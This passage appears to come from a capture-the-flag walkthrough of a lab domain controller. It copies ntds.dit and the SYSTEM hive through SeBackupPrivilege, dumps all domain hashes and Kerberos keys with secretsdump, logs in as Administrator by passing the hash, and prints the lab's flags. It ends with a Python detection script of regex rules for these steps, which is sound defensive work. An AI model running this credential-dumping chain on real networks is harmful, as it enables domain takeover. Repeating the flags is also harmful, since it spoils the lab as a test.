*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit .\NTDS
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM .\SYSTEM

Download them locally:

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> download NTDS

Info: Downloading C:\Users\thomas.brown\Desktop\NTDS to NTDS

Info: Download successful!
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> download SYSTEM

Info: Downloading C:\Users\thomas.brown\Desktop\SYSTEM to SYSTEM

Info: Download successful!

Escalating to Administrator

Extract the NTLM hashes with secretsdump from the impacket toolkit.

This gives the Administrator hash 3a79fceda1024c1344c493c1f6e4c6c0:

❯ impacket-secretsdump LOCAL -system SYSTEM -ntds NTDS
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x9a6eda47674d4ed68313ddc1c8f9ca5b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 5e8a0e9e33e9b3e49f0767e39f3e7d29
[*] Reading and decrypting hashes from NTDS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3a79fceda1024c1344c493c1f6e4c6c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1001:aad3b435b51404eeaad3b435b51404ee:0e0e9e9b2d198f0988bb046450ae8197:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cdf274ce9ec9f879a8628fb04fec328d:::
neptune.thl\lucas.miller:1105:aad3b435b51404eeaad3b435b51404ee:56154d1fd4584ab98e61ea03f04e3a5c:::
neptune.thl\victor.rodriguez:1106:aad3b435b51404eeaad3b435b51404ee:8db2402812596e4ee8de3cfd342080cb:::
neptune.thl\emma.johnson:1107:aad3b435b51404eeaad3b435b51404ee:f08cf9706d0cd39f0724d4d77a43ef20:::
neptune.thl\thomas.brown:1108:aad3b435b51404eeaad3b435b51404ee:a97af7a0313e8f11f6a6f8b3916c6570:::
[*] Kerberos keys from NTDS
Administrator:aes256-cts-hmac-sha1-96:0642f2a9f255f8e6bfb9cd827e0897605d6fe9324d3fda7ca7ce41e4ca2a00a2
Administrator:aes128-cts-hmac-sha1-96:88e7d25adb8ae1ca38cf476306cc32e7
Administrator:des-cbc-md5:5e469161b5b52adf
DC01$:aes256-cts-hmac-sha1-96:6f3f7f3cc6992fcf1d2336d4a4ec82b11a8318a664a48abd64c72a12760312be
DC01$:aes128-cts-hmac-sha1-96:49bb4efcce6f8fe2871043cb2dccba50
DC01$:des-cbc-md5:9d34e5d9e9b0973d
krbtgt:aes256-cts-hmac-sha1-96:8185b80ffe2ac9852ff781f177829871396e7a9d1b9573229a7103c85fa94591
krbtgt:aes128-cts-hmac-sha1-96:c704596e73d5132b8c0d4eda9623bd8a
krbtgt:des-cbc-md5:7f23a49d3d94feae
neptune.thl\lucas.miller:aes256-cts-hmac-sha1-96:fef49d0e477adde08160ee2fb46a3f09fafec3eb4086098ae289e703db1b29a1
neptune.thl\lucas.miller:aes128-cts-hmac-sha1-96:9d773ecedad0dd144d366d07cbdb8fd8
neptune.thl\lucas.miller:des-cbc-md5:d01ab9ef2c8a13f2
neptune.thl\victor.rodriguez:aes256-cts-hmac-sha1-96:53da4cfdece959fed22f2485555b0b8ae5d2dc442c307a5a8e537a03be0622a9
neptune.thl\victor.rodriguez:aes128-cts-hmac-sha1-96:7d6304d35d89975bd0425b986e2405a2
neptune.thl\victor.rodriguez:des-cbc-md5:ea6efd6ecb803d9b
neptune.thl\emma.johnson:aes256-cts-hmac-sha1-96:228e7f3e7d8b1d7aa7d989df37fb5ca70672076c5e2691ee0724b2b99fa02a6e
neptune.thl\emma.johnson:aes128-cts-hmac-sha1-96:7bbfc3c1d6a07a367ad76204d92fb7cd
neptune.thl\emma.johnson:des-cbc-md5:9197b3b0518aea89
neptune.thl\thomas.brown:aes256-cts-hmac-sha1-96:1186489678902eb9afbe7f4637f650ea419f7965dc242d431ea3414169c96ef8
neptune.thl\thomas.brown:aes128-cts-hmac-sha1-96:a5cd3863dd9652fbfbe8891dcc46d02f
neptune.thl\thomas.brown:des-cbc-md5:5ed0cb83104aa2e3
[*] Cleaning up...

No need to crack the hash; log in with the hash directly:

❯ evil-winrm -i $ip -u Administrator -H 3a79fceda1024c1344c493c1f6e4c6c0

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/26/2025 8:52 PM 32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cb067ebf9847990f92f49c0612ef56b6
*Evil-WinRM* PS C:\Users> cd 'Emma Johnson/Desktop'
*Evil-WinRM* PS C:\Users\Emma Johnson\Desktop> type user.txt
a5accd70ea911b92487cea1d1cb73162

If your Kali has no internet access you can skip the DLLs and copy the files with robocopy /B instead; the result is the same:

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> robocopy H:\Windows\System32\config .\ SYSTEM /B
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> robocopy H:\Windows\NTDS\ .\ NTDS.dit /B
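Both routes to ntds.dit shown above (diskshadow plus the SeBackupPrivilege cmdlets, or robocopy /B against the exposed shadow copy) leave characteristic command lines on the domain controller. The following is an added example, not part of the original walkthrough: a Python detection pass over constructed process-creation events (modelled on Sysmon Event ID 1 fields, not real telemetry) that flags diskshadow script runs, backup-mode copies, the SeBackupPrivilege cmdlets and any command line touching the NTDS database or the registry hives, plus a helper that summarises what a diskshadow script file would snapshot and expose. The event fields, user names and rule names are this example's own assumptions.

```python
import re

# Constructed process-creation events (not from the original page), in the shape a
# Sysmon Event ID 1 / EDR feed would give: who ran what, from which parent process.
SAMPLE_EVENTS = [
    {"id": 1, "user": r"NEPTUNE\thomas.brown", "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "image": r"C:\Windows\System32\diskshadow.exe", "cmdline": r"diskshadow /s tmp.txt"},
    {"id": 2, "user": r"NEPTUNE\thomas.brown", "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "image": r"C:\Windows\System32\robocopy.exe", "cmdline": r"robocopy H:\Windows\NTDS\ .\ NTDS.dit /B"},
    {"id": 3, "user": r"NEPTUNE\svc.backup", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\robocopy.exe", "cmdline": r"robocopy C:\Confidenciales E:\Backups\Confidenciales /MIR"},
    {"id": 4, "user": r"NEPTUNE\thomas.brown", "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM .\SYSTEM"},
    {"id": 5, "user": r"NEPTUNE\Administrator", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\diskshadow.exe", "cmdline": r"diskshadow"},
]

# Each rule: name -> regex over the command line. Severity is decided by which rules fire together.
RULES = {
    "diskshadow_script": re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.IGNORECASE),
    "shadow_copy_path": re.compile(r"HarddiskVolumeShadowCopy\d+", re.IGNORECASE),
    "robocopy_backup_mode": re.compile(r"\brobocopy(\.exe)?\b.*\s/B\b", re.IGNORECASE),
    "sebackup_cmdlet": re.compile(r"Copy-FileSeBackupPrivilege|SeBackupPrivilege\w*\.dll", re.IGNORECASE),
    "credential_store_path": re.compile(r"\\ntds\\|ntds\.dit|\\system32\\config\\(system|sam|security)\b", re.IGNORECASE),
}
HIGH_IF_ANY = {"sebackup_cmdlet", "credential_store_path"}


def classify_event(event):
    """Return the names of the rules matched by one event's command line."""
    return [name for name, rx in RULES.items() if rx.search(event["cmdline"])]


def severity(matched):
    """High when a credential-store rule fires or two rules combine; medium for a lone weak signal."""
    if not matched:
        return None
    if HIGH_IF_ANY & set(matched) or len(matched) >= 2:
        return "high"
    return "medium"


def detect(events):
    """Return {event id: (severity, matched rules)} for events that trip at least one rule."""
    out = {}
    for ev in events:
        matched = classify_event(ev)
        sev = severity(matched)
        if sev:
            out[ev["id"]] = (sev, matched)
    return out


def summarize_diskshadow_script(script_text):
    """Summarise a diskshadow script file: whether it creates a snapshot, of which volumes, exposed where."""
    summary = {"creates": False, "volumes": [], "exposes": []}
    for line in script_text.splitlines():
        parts = line.strip().lower().split()
        if not parts:
            continue
        if parts[0] == "create":
            summary["creates"] = True
        elif parts[:2] == ["add", "volume"] and len(parts) >= 3:
            summary["volumes"].append(parts[2])
        elif parts[0] == "expose" and len(parts) >= 3:
            summary["exposes"].append(parts[2])
    return summary


if __name__ == "__main__":
    for event_id, (sev, rules) in detect(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {sev} ({', '.join(rules)})")
```

A plain `diskshadow` launched interactively by an administrator (event 5) stays silent, and a scheduled robocopy mirror (event 3) stays silent; a backup-mode copy or a SeBackupPrivilege cmdlet aimed at the NTDS or hive paths is what escalates to high. The script summariser is meant for the file referenced by `/s`, so the alert can say which volume was snapshotted and which drive letter it was exposed as.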